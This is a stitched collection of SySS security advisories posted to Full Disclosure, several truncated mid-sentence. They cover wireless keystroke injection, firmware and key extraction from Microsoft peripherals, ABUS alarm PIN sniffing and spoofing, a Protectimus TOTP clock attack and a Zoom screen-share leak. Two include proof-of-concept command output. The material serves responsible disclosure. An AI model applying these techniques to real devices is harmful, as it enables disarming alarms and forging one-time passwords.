https://www.wolfvision.com/vsolution/index.php/en/presentation-systems/cynap/cynap
[2] WolfVision firmware downloads
https://wolfvision.com/vsolution/index.php/de/support/downloads
[3] SySS Security Advisory SYSS-2019-021
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-021.txt
[4] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
[5] SySS Proof-of-Concept Video "Administrating WolfVision Cynap the
Hacker's Way"
https://youtu.be/veEtiYAWvMY



Credits:

This security vulnerability was found by Manuel Stotz and Gerhard
Klostermeier of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of 

[FD] [SYSS-2019-027]: Inateck BCST-60 Barcode Scanner - Keystroke Injection Vulnerability (CVE-2019-12503)

2019-11-29 Thread Matthias Deeg
Advisory ID: SYSS-2019-027
Product: BCST-60 Barcode Scanner
Manufacturer: Inateck
Affected Version(s): BCST-60
Tested Version(s): BCST-60
Vulnerability Type: Cryptographic Issues (CWE-310)
Keystroke Injection Vulnerability
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-05-22
Solution Date: -
Public Disclosure: 2019-11-28
CVE Reference: CVE-2019-12503
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Inateck BCST-60 is a barcode scanner that can be either used wirelessly
using 2.4 GHz radio communication or wired via USB.

The manufacturer describes the product as follows [1]:

"With a 2.4G wireless connection, avoid the troubles of Bluetooth
pairing. Inateck BCST-60 is a leading product among scanners in the
field of large transmission ranges and battery endurance. What's more,
it can read barcodes at extreme angles. Whether you need barcode
scanning at your retail POS, at a hospital patient's bedside, on the
manufacturing production line or your warehouse, the Inateck BCST-60
will be a great fit for your specific needs."

Due to an insecure implementation of the data communication, the
wireless barcode scanner Inateck BCST-60 is vulnerable to keystroke
injection attacks.



Vulnerability Details:

SySS GmbH found out that the wireless barcode scanner Inateck BCST-60 is
vulnerable to keystroke injection attacks.

An attacker can analyze the unencrypted and unauthenticated data packets
of the 2.4 GHz radio communication sent by the wireless barcode scanner
to the receiver (USB dongle) in order to learn the used protocol. By
knowing the used data protocol, it is possible to send packets to the
USB dongle (receiver) of a target system, containing attacker-controlled
keystrokes or keystroke sequences.



Proof of Concept (PoC):

SySS GmbH could successfully perform keystroke injection attacks against
the wireless barcode scanner Inateck BCST-60 using a developed
proof-of-concept software tool in combination with the USB radio dongle
Crazyradio PA and the nrf-research-firmware by Marc Newlin [2, 3].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2019-05-22: Vulnerability reported to manufacturer
2019-11-28: Public release of security advisory



References:

[1] Product website for Inateck BCST-60 barcode scanner
https://www.inateck.com/bcst-60-2-4ghz-wireless-barcode-scanner-with-35m-range.html
[2] Product website for Crazyradio PA
https://www.bitcraze.io/crazyradio-pa/
[3] nRF24 research firmware and tools by Marc Newlin
https://github.com/marcnewlin/presentation-clickers
[4] SySS Security Advisory SYSS-2019-027
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-027.txt
[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en





[FD] [SYSS-2019-033]: Microsoft Designer Bluetooth Desktop - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)

2019-10-11 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2019-033
Product: Designer Bluetooth Desktop
Manufacturer: Microsoft
Affected Version(s): n/a
Tested Version(s): n/a
Vulnerability Type: Insufficient Protection of Code (Firmware) and
Data (Cryptographic Key)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-07-31
Solution Date: -
Public Disclosure: 2019-10-10
CVE Reference: Not assigned yet
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Microsoft Designer Bluetooth Desktop is a Bluetooth Low Energy (LE)
wireless desktop set consisting of a keyboard and a mouse.

The manufacturer describes the product as follows (see [1]):

"With its ultra-thin and modern look, the Designer Bluetooth Desktop
complements the look of your desk. It wirelessly pairs to your laptop or
tablet with the latest Bluetooth Smart technology - instantly connecting
without wires or dongles to manage. A full-sized keyboard with built-in
number pad and mouse will keep you productive at your desk."

Due to the insufficient protection of the flash memory of the keyboard,
an attacker with physical access has read and write access to the
firmware and the used cryptographic key.



Vulnerability Details:

SySS GmbH found out that the embedded flash memory of the Microsoft
Designer Bluetooth Desktop keyboard can be read and written via the SWD
(Serial Wire Debug) interface of the used nRF51822 Bluetooth SoC [2] as
the flash memory is not protected by the offered readback protection
feature.

Thus, an attacker with physical access to the keyboard can simply read
and write the nRF51822 flash memory contents and either extract the
cryptographic key (Bluetooth LE Long Term Key), for instance, to
perform further attacks against the wireless communication, or modify
the firmware.

However, even if the readback protection of the nRF51822 was enabled,
an attacker would be able to read and write the flash memory contents by
bypassing the security feature as described in [3] and [4] with
slightly more effort.



Proof of Concept (PoC):

SySS GmbH could successfully read the nRF51822 flash memory contents of
the Microsoft Designer Bluetooth Desktop keyboard via the SWD interface
using a SEGGER J-Link PRO [5] debug probe in combination with SEGGER
J-Link Commander and extract the currently used cryptographic key (Long
Term Key).



Solution:

According to Microsoft, the reported security issue does not meet
the bar for servicing via a security update [6].

The described security issue may be fixed in future versions of the
product.



Disclosure Timeline:

2019-07-31: Vulnerability reported to manufacturer
2019-08-01: Microsoft confirms receipt of security advisory
2019-08-06: Microsoft responds that the reported issue does not meet
the bar for servicing via a security update
2019-10-10: Public release of SySS security advisory



References:

[1] Product website for Microsoft Designer Bluetooth Desktop
https://www.microsoft.com/accessories/en-us/products/keyboards/designer-bluetooth-desktop/7n9-1
[2] nRF51822 Product Specification v3.1
https://infocenter.nordicsemi.com/pdf/nRF51822_PS_v3.1.pdf
[3] Kris Brosch, Include Security, Firmware dumping technique for an ARM
Cortex-M0 SoC, 2015
https://blog.includesecurity.com/2015/11/NordicSemi-ARM-SoC-Firmware-dumping-technique.html
[4] Andrew Tierney, Pen Test Partners, NRF51822 code readout protection
bypass - a how-to, 2018
https://www.pentestpartners.com/security-blog/nrf51822-code-readout-protection-bypass-a-how-to/
[5] Product website for Segger J-Link PRO
https://www.segger.com/products/debug-probes/j-link/models/j-link-pro/
[6] Microsoft Vulnerability Severity Classification for Windows
https://aka.ms/windowsbugbar
[7] SySS Security Advisory SYSS-2019-033
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-033.txt
[8] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without 

[FD] [SYSS-2019-034]: Microsoft Surface Keyboard - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)

2019-10-11 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2019-034
Product: Surface Keyboard
Manufacturer: Microsoft
Affected Version(s): WS2-5
Tested Version(s): WS2-5
Vulnerability Type: Insufficient Protection of Code (Firmware) and
Data (Cryptographic Key)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-07-31
Solution Date: -
Public Disclosure: 2019-10-10
CVE Reference: Not assigned yet
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Microsoft Surface Keyboard is a Bluetooth Low Energy (LE) keyboard.

The manufacturer describes the product as follows (see [1]):

"Meticulously crafted, just like your Surface
Enjoy the solid feel of the keyboard under your fingers as you work.
And it pairs seamlessly with your Surface with Wireless Bluetooth - at a
range of up to 50 feet - and battery power to last a full year."

Due to the insufficient protection of the flash memory of the keyboard,
an attacker with physical access has read and write access to the
firmware and the used cryptographic key.



Vulnerability Details:

SySS GmbH found out that the embedded flash memory of the Bluetooth LE
Microsoft Surface Keyboard can be read and written via the SWD (Serial
Wire Debug) interface of the used nRF51822 Bluetooth SoC [2] as the
flash memory is not protected by the offered readback protection
feature.

Thus, an attacker with physical access to the keyboard can simply read
and write the nRF51822 flash memory contents and either extract the
cryptographic key (Bluetooth LE Long Term Key), for instance, to
perform further attacks against the wireless communication, or modify
the firmware.

However, even if the readback protection of the nRF51822 was enabled,
an attacker would be able to read and write the flash memory contents by
bypassing the security feature as described in [3] and [4] with
slightly more effort.



Proof of Concept (PoC):

SySS GmbH could successfully read the nRF51822 flash memory contents of
the Microsoft Surface Keyboard via the SWD interface using a SEGGER
J-Link PRO [5] debug probe in combination with SEGGER J-Link Commander
and extract the currently used cryptographic key (Long Term Key).



Solution:

According to Microsoft, the reported security issue does not meet
the bar for servicing via a security update [6].

The described security issue may be fixed in future versions of the
product.



Disclosure Timeline:

2019-07-31: Vulnerability reported to manufacturer
2019-08-01: Microsoft confirms receipt of security advisory
2019-08-06: Microsoft responds that the reported issue does not meet
the bar for servicing via a security update
2019-10-10: Public release of SySS security advisory



References:

[1] Product website for Microsoft Surface Keyboard
https://www.microsoft.com/en-us/p/surface-keyboard/8r3rqvvflp4k
[2] nRF51822 Product Specification v3.1
https://infocenter.nordicsemi.com/pdf/nRF51822_PS_v3.1.pdf
[3] Kris Brosch, Include Security, Firmware dumping technique for an ARM
Cortex-M0 SoC, 2015
https://blog.includesecurity.com/2015/11/NordicSemi-ARM-SoC-Firmware-dumping-technique.html
[4] Andrew Tierney, Pen Test Partners, NRF51822 code readout protection
bypass - a how-to, 2018
https://www.pentestpartners.com/security-blog/nrf51822-code-readout-protection-bypass-a-how-to/
[5] Product website for Segger J-Link PRO
https://www.segger.com/products/debug-probes/j-link/models/j-link-pro/
[6] Microsoft Vulnerability Severity Classification for Windows
https://aka.ms/windowsbugbar
[7] SySS Security Advisory SYSS-2019-034
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-034.txt
[8] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available 

[FD] [SYSS-2019-035]: Microsoft Surface Mouse - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)

2019-10-11 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2019-035
Product: Surface Mouse
Manufacturer: Microsoft
Affected Version(s): WS3-2
Tested Version(s): WS3-2
Vulnerability Type: Insufficient Protection of Code (Firmware) and
Data (Cryptographic Key)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-07-31
Solution Date: -
Public Disclosure: 2019-10-10
CVE Reference: Not assigned yet
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Microsoft Surface Mouse is a Bluetooth Low Energy (LE) mouse.

The manufacturer describes the product as follows (see [1]):

"Sculpted for your hand and designed for an elegantly simple work space,
Mouse is the perfect partner to your docked Surface and Keyboard. It was
designed to match the sleek aesthetic and exceptional performance of
your Surface. The metal scroll wheel feels solid under your finger,
and the shape of the body fits perfectly in your hand."

Due to the insufficient protection of the flash memory of the mouse, an
attacker with physical access has read and write access to the firmware
and the used cryptographic key.



Vulnerability Details:

SySS GmbH found out that the embedded flash memory of the Bluetooth LE
Microsoft Surface Mouse can be read and written via the SWD (Serial Wire
Debug) interface of the used nRF51822 Bluetooth SoC [2] as the flash
memory is not protected by the offered readback protection feature.

Thus, an attacker with physical access to the mouse can simply read and
write the nRF51822 flash memory contents and either extract the
cryptographic key (Bluetooth LE Long Term Key), for instance to perform
further attacks against the wireless communication, or modify the
firmware.

However, even if the readback protection of the nRF51822 were enabled,
an attacker would still be able to read and write the flash memory
contents with slightly more effort by bypassing this security feature as
described in [3] and [4].



Proof of Concept (PoC):

SySS GmbH could successfully read the nRF51822 flash memory contents of
the Microsoft Surface Mouse via the SWD interface using a SEGGER J-Link
PRO [5] debug probe in combination with SEGGER J-Link Commander and
extract the currently used cryptographic key (Long Term Key).



Solution:

According to Microsoft, the reported security issue does not meet
the bar for servicing via a security update [6].

The described security issue may be fixed in future versions of the
product.



Disclosure Timeline:

2019-07-31: Vulnerability reported to manufacturer
2019-08-01: Microsoft confirms receipt of security advisory
2019-08-06: Microsoft responds that the reported issue does not meet
the bar for servicing via a security update
2019-10-10: Public release of SySS security advisory



References:

[1] Product website for Microsoft Surface Mouse
https://www.microsoft.com/en-us/store/d/surface-mouse/8qbtdr3q4rpw
[2] nRF51822 Product Specification v3.1
https://infocenter.nordicsemi.com/pdf/nRF51822_PS_v3.1.pdf
[3] Kris Brosch, Include Security, Firmware dumping technique for an ARM
Cortex-M0 SoC, 2015
https://blog.includesecurity.com/2015/11/NordicSemi-ARM-SoC-Firmware-dumping-technique.html
[4] Andrew Tierney, Pen Test Partners, NRF51822 code readout protection
bypass - a how-to, 2018
https://www.pentestpartners.com/security-blog/nrf51822-code-readout-protection-bypass-a-how-to/
[5] Product website for Segger J-Link PRO
https://www.segger.com/products/debug-probes/j-link/models/j-link-pro/
[6] Microsoft Vulnerability Severity Classification for Windows
https://aka.ms/windowsbugbar
[7] SySS Security Advisory SYSS-2019-035
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-035.txt
[8] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of th

[FD] [SYSS_2020-014]: ABUS Secvest Wireless Control Device (FUBE50001) - Missing Encryption of Sensitive Data (CWE-311) (CVE-2020-14157)

2020-06-23 Thread Matthias Deeg
Advisory ID: SYSS-2020-014
Product: ABUS Secvest Wireless Control Device (FUBE50001)
Manufacturer: ABUS
Affected Version(s): N/A
Tested Version(s): N/A
Vulnerability Type: Missing Encryption of Sensitive Data (CWE-311)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2020-04-03
Solution Date: -
Public Disclosure: 2020-06-17
CVE Reference: CVE-2020-14157
Authors of Advisory: Michael Rüttgers, Thomas Detert,
 Matthias Deeg (SySS GmbH)



Overview:

ABUS Secvest Wireless Control Device (FUBE50001) is a wireless control
panel for the ABUS Secvest wireless alarm system.

Some of the device features as described by the manufacturer are
(see [1]):

"
* Easy operation via code or proximity keyfob
  The Secvest wireless control panel is an optional Secvest accessory.
  Every wireless control panel can be operated from your system via PIN
  code. It is possible to arm and disarm the panel via proximity keyfob.

* Flexible use in entrance areas
  Up to 8 control panels can be integrated into the alarm system. These
  additional modules can be placed in various areas of the building.
  This provides added convenience for you, because Secvest can be armed
  and disarmed directly on the wireless control panel, without the need
  to go back to the central alarm panel every time.
  In addition to internal arming or arming individual sub-areas, you can
  also switch a single output, such as the garage door, if desired.

* Secure wireless communication
  Thanks to a secure wireless communication procedure, this product is
  protected against ‘replay attacks’, as are the Secvest wireless alarm
  system and Secvest Touch alarm systems. This procedure for preventing
  third-party tampering exceeds the requirements of the “DIN EN 50131-1
  level 2” security standard.
"

Due to the missing encryption of the wireless communication, an attacker
is able to eavesdrop on sensitive data transmitted in cleartext, for
instance PINs or proximity token IDs.



Vulnerability Details:

Michael Rüttgers found out that the wireless communication of the ABUS
Secvest Wireless Control Device (FUBE50001) for transmitting sensitive
data like PIN codes or IDs of used proximity chip keys (RFID tokens) is
not encrypted.

This security issue is related to the insecure wireless transmission of
sensitive data of the ABUS Secvest remote controls FUBE50014 and
FUBE50015 reported back in 2018 (see SySS security advisory
SYSS-2018-035 [2]).

Thus, an attacker observing radio signals of an ABUS FUBE50001
wireless control panel is able to see all sensitive data of transmitted
packets as cleartext and can analyze the used packet format and the
communication protocol.

For instance, this security issue could successfully be exploited to
sniff PIN codes and proximity chip key IDs in use.

By knowing the correct PIN code or the ID of a valid ABUS Secvest
proximity chip key, an attacker is able to disarm the wireless alarm
system in an unauthorized way.



Proof of Concept (PoC):

Michael Rüttgers, Thomas Detert, and Matthias Deeg developed different
PoC software tools, one version for the RFCat-based radio dongle YARD
Stick One [3] and another for the GreatFET One neighbor Erica [4], that
allow sniffing PIN codes or proximity chip key IDs by eavesdropping on
the FUBE50001 wireless communication.

The following output shows an example of a successful PIN code sniffing
attack:

$ python2 abus_fube50001_pin_sniffer.py
ABUS Secvest FUBE50001 PIN Code Sniffer PoC - SySS GmbH (c) 2020
by Thomas Detert, Michael Rüttgers, and Matthias Deeg
---
[*] Listening for ABUS FUBE50001 packets ...
[*] Received packet:
f0f352b4ccb4ccd52aab52d2acd2d34d4cb34cb32b34d4b530f0f0f352b4ccb4ccd52aab52d2acd2d34d4cb34cb32b34d4b530f0f0f3117162f5
[*] Decoded packet : da0a077ed5c54900626b
[*] Received packet:
f0f352b4b32b4d352ad5332aab2cb34cd3332cccb4ccacb354acd2ab32aab54d30f0f0f352b4b32b4d352ad5332aab2cb34cd3332cccb4ccacb354ac
[*] Decoded packet : da86937707e4884040a0c8ecff005e1fb9
[*] Detected FUBE50001 packet with FUBE50001 PIN
[+] Sniffed PIN code: 1337
(...)

An example of a successful sniffing attack regarding the ID of an ABUS
proximity chip key is illustrated in the following output:

$ python2 abus_fube50001_chip_key_id_sniffer.py
ABUS Secvest FUBE50001 Proximity Chip Key ID Sniffer PoC - SySS GmbH (c)
2020
by Thomas Detert, Michael Rüttgers, and Matthias Deeg
---
[*] Listening for ABUS FUBE50001 packets ...
[*] Received packet:
f0f352b4b332b2cad52accd554d34cb32cccd2b34ab2cd2b2d4ad32ad2aacaacd32b30f0f0f3057c0764bf788b6ce7d0de43f6c1cb71e7374b7bd7c7a1abe567
[*] Decoded packet: da81937707e488404018b9165b475f3c46
[*] Detected FUBE50001 packet with proximity token ID
[

[FD] [SYSS-2020-015]: ABUS Secvest Hybrid module (FUMO50110) - Authentication Bypass Using an Alternate Path or Channel (CWE-288) (CVE-2020-14158)

2020-07-30 Thread Matthias Deeg
Advisory ID: SYSS-2020-015
Product: ABUS Secvest Hybrid module (FUMO50110)
Manufacturer: ABUS
Affected Version(s): N/A
Tested Version(s): N/A
Vulnerability Type: Authentication Bypass Using an Alternate Path or
Channel (CWE-288)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2020-04-03
Solution Date: -
Public Disclosure: 2020-07-30
CVE Reference: CVE-2020-14158
Authors of Advisory: Michael Rüttgers, Thomas Detert,
 Matthias Deeg (SySS GmbH)



Overview:

The ABUS Secvest Hybrid module is an expansion module that bridges
between the ABUS Secvest alarm panel [1] and additional wired systems.

Some of the supported features as described by the manufacturer are
(see [2]):

"
* The hybrid module turns wireless into wired and wired into
  wireless. And alarm systems into combined security systems. By
  connecting to the ABUS wAppLoxx, the property benefits from intelligent
  access management while simultaneously eliminating false alarms.
* In combination with Secvest, the hybrid module can also be used to
  implement numerous smart home scenarios. Garage doors, household lighting
  or rolling shutters can be operated in this way, for example.
"

Because the radio communication used provides neither confidentiality
nor integrity protection, different radio-based attacks are possible.



Vulnerability Details:

The hybrid module does not have any security mechanism that ensures
confidentiality or integrity of RF packets that are exchanged between
the ABUS Secvest alarm panel and the ABUS Secvest Hybrid module. Thus,
an attacker can spoof messages of the ABUS Secvest Hybrid module based
on sniffed status RF packets that are issued by the ABUS Secvest Hybrid
module on a regular basis (about every 2.5 minutes).

One of the suggested use cases in [3] (page 27) is the link of a
wAppLoxx to the ABUS Secvest alarm panel via the ABUS Secvest Hybrid
module.

In the intended use case, this allows the ABUS Secvest panel to be
disarmed at the same time the wAppLoxx system grants access to a
properly authenticated user.

By spoofing the ABUS Secvest Hybrid module RF messages, an attacker is
able to bypass the authentication of wAppLoxx in such a system
configuration without any user interaction.
For clarity, the authentication of the wAppLoxx cylinder itself is not
affected by this attack, and an attacker still needs to gain access to
the protected object.

The input channels of the ABUS Secvest Hybrid module are simply mapped
to a 4-byte field in the RF packets. Modifying those bytes allows an
attacker to simulate any change on the ABUS Secvest Hybrid module
inputs.



Proof of Concept (PoC):

Michael Rüttgers and Thomas Detert developed a PoC tool using the
RFCat-based radio dongle YARD Stick One [4] that allows spoofing RF
packets and thus bypassing the authentication of wAppLoxx in the
described system configuration. They provided their tool including
documentation and source code to SySS GmbH for responsible disclosure
purposes.

SySS GmbH could successfully perform the described authentication bypass
attack against an ABUS Secvest wireless alarm system used with the ABUS
Secvest Hybrid module (FUMO50110).

The described spoofing attack is demonstrated in the SySS
proof of concept video titled "ABUS Secvest Spoofing Attack", which is
available on the SySS YouTube channel "Pentest TV" [7].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2020-04-03: Vulnerability reported to manufacturer
2020-07-30: Public release of security advisory



References:

[1] Product Website for ABUS Secvest Wireless Alarm System
https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System
[2] Product Website for ABUS Secvest Hybrid Module
https://www.abus.com/uk/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Secvest-Hybrid-module
[3] Installation Instructions and User Guide
https://www.abus.com/var/ImagesPIM/d110001/medias/docus/22/FUMO50110_BDA_INT_1_3.pdf
[4] Product Website YARD Stick One
https://greatscottgadgets.com/yardstickone/
[5] SySS Security Advisory SYSS-2020-015
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-015.txt
[6] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
[7] SySS Proof of Concept Video: ABUS Sec

[FD] [SYSS-2021-007]: Protectimus SLIM NFC - External Control of System or Configuration Setting (CWE-15) (CVE-2021-32033)

2021-06-18 Thread Matthias Deeg
Advisory ID: SYSS-2021-007
Product: Protectimus SLIM NFC
Manufacturer: Protectimus
Affected Version(s): Hardware Scheme 70 / Software Version 10.01
Tested Version(s): Hardware Scheme 70 / Software Version 10.01
Vulnerability Type: External Control of System or Configuration Setting
(CWE-15)
"Time Traveler Attack"
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2021-02-04
Solution Date: -
Public Disclosure: 2021-06-16
CVE Reference: CVE-2021-32033
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Protectimus SLIM NFC is a reprogrammable time-based one-time password
(TOTP) hardware token.

The manufacturer describes the product as follows (see [1]):

"
Protectimus SLIM mini is a new generation of reprogrammable TOTP
hardware tokens. They can be used in 2FA systems based on OATH
standards, and easily reflashed using an application installed on your
NFC-capable Android smartphone. It allows the user to determine the
OTP’s expires (30 or 60 seconds), and also set up a secret key.
"

Due to a design error, the time (internal real-time clock) of the
Protectimus SLIM TOTP hardware token can be set, independently of the
seed (secret key) used for generating one-time passwords, without any
authentication.



Vulnerability Details:

When analyzing the Protectimus SLIM TOTP hardware token, Matthias Deeg
found out that the time used by the token can be set independently of
the seed value used for generating time-based one-time passwords,
without requiring any authentication.

Thus, an attacker with short-time physical access to a Protectimus SLIM
token can set the internal real-time clock (RTC) to the future,
generate one-time passwords, and reset the clock to the current time.

This allows for generating valid future time-based one-time passwords
without having further access to the hardware token.



Proof of Concept (PoC):

For demonstrating the time traveler attack exploiting the described
security vulnerability, Matthias Deeg developed a Lua script for the
Proxmark3 [2].

The following output shows an example of a successful attack that
generates a valid future one-time password for an attacker-chosen point
in time against a vulnerable Protectimus SLIM TOTP hardware token:

[usb] pm3 --> script run hf_14a_protectimus_nfc -t 2021-03-14T13:37:00+01:00
[+] executing lua
/home/matt/research/proxmark3/client/luascripts/hf_14a_protectimus_nfc.lua
[+] args '-t 2021-03-14T13:37:00+01:00'
[+] Found token with UID 3F1323540E
[+] Set Unix time 1615725420
[!] Please power the token and press 

[+] The future OTP on 2021-03-14T13:37:00+01:00 (1615725420) is 303831
[+] Set Unix time 1612451460

[+] finished hf_14a_protectimus_nfc


A SySS proof of concept video illustrating this security vulnerability
is available on our SySS Pentest TV YouTube channel [5].

The developed Lua script for Proxmark3 is available on our GitHub
site [6].



Solution:

SySS is not aware of a solution for the described security issue.



Disclosure Timeline:

2021-02-04: Vulnerability reported to manufacturer
2021-02-04: Manufacturer acknowledges receipt of security advisory and
asks for further information
2021-02-05: SySS provides further information to manufacturer
2021-06-16: Public release of security advisory



References:

[1] Product website for Protectimus SLIM NFC
https://www.protectimus.com/protectimus-slim-mini/
[2] Proxmark3 GitHub repository by the RFID Research Group
https://github.com/RfidResearchGroup/proxmark3
[3] SySS Security Advisory SYSS-2021-007
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-007.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
[5] SySS Proof of Concept Video: To the Future and Back - Attacking a
TOTP Hardware Token
https://www.youtube.com/watch?v=C0pM6TIyvXI
[6] Protectimus SLIM NFC Lua script for Proxmark3
https://github.com/SySS-Research/protectimus-slim-proxmark3



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provi

[FD] [SYSS-2020-044]: Zoom - Exposure of Resource to Wrong Sphere (CWE-668) (CVE-2021-28133)

2021-03-19 Thread Matthias Deeg
Advisory ID: SYSS-2020-044
Product: Zoom
Manufacturer: Zoom Video Communications, Inc.
Affected Version(s): 5.4.3 (54779.1115)
 5.5.4 (13142.0301)
Tested Version(s): 5.4.3 (54779.1115)
   5.5.4 (13142.0301)
Vulnerability Type: Exposure of Resource to Wrong Sphere (CWE-668)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2020-12-02
Solution Date: -
Public Disclosure: 2021-03-18
CVE Reference: CVE-2021-28133
Authors of Advisory: Michael Strametz, Matthias Deeg



Overview:

Zoom is a video conferencing and messaging software with support for
many different devices.

Some of the supported features as described by the manufacturer are
(see [1]):

"
* Unparalleled usability
  Enable quick adoption with meeting capabilities that make it easy to
  start, join, and collaborate across any device.

* Join anywhere, on any device
  Zoom Meetings syncs with your calendar system and delivers streamlined
  enterprise-grade video conferencing from desktop and mobile.

* Powerful meeting security
  Robust security settings ensure disruption-free meetings. Encryption,
  role-based security, Passcode protection, Waiting Rooms and more.
"

Due to a security issue concerning the "share screen" functionality,
screen contents of applications which are not explicitly shared by the
screen-sharing user can be seen by other meeting participants.



Vulnerability Details:

When a Zoom user shares a specific application window via the "share
screen" functionality, other meeting participants can briefly see
contents of other application windows which were not explicitly shared.

The contents of unshared application windows can, for instance, be seen
for a short period of time by other users when those windows overlap the
shared application window and receive focus.

Depending on the unintentionally shared data, this short exposure of
screen contents may be a more or less severe security issue.

A participant of a Zoom meeting who records the meeting using screen
recorder software may afterwards have access to sensitive data of other
users which is visible in a few frames of the recorded video.



Proof of Concept (PoC):

SySS could successfully demonstrate the described attack concerning
screen recordings of Zoom meetings with unintentionally shared screen
contents using both the current Windows and Linux Zoom client software.

In this attack scenario, the two users Alice and Mallory are in the
same Zoom meeting and Alice shares her web browser window via the "share
screen" functionality.

Mallory records her whole desktop screen using screen recorder
software, for instance SimpleScreenRecorder [3].

Between showing different things in her shared web browser window, Alice
uses another application whose application window happens to overlay
the shared web browser window.

The contents of this other application window, which is explicitly not
shared with Mallory, can sometimes briefly be seen by Mallory.

When watching the created screen recording, Mallory can pause the video
at will and thus see the unintentionally shared application window
contents from Alice.

A SySS proof of concept video illustrating this security issue is
available on our SySS Pentest TV YouTube channel [5].



Solution:

SySS GmbH is not aware of a fix for the described security issue.
Please contact the software manufacturer for further information.



Disclosure Timeline:

2020-12-02: Vulnerability reported to manufacturer
2020-12-02: Manufacturer acknowledges receipt of security advisory
2020-12-02: Manufacturer asks for more information
2020-12-03: SySS provides more information concerning the security issue
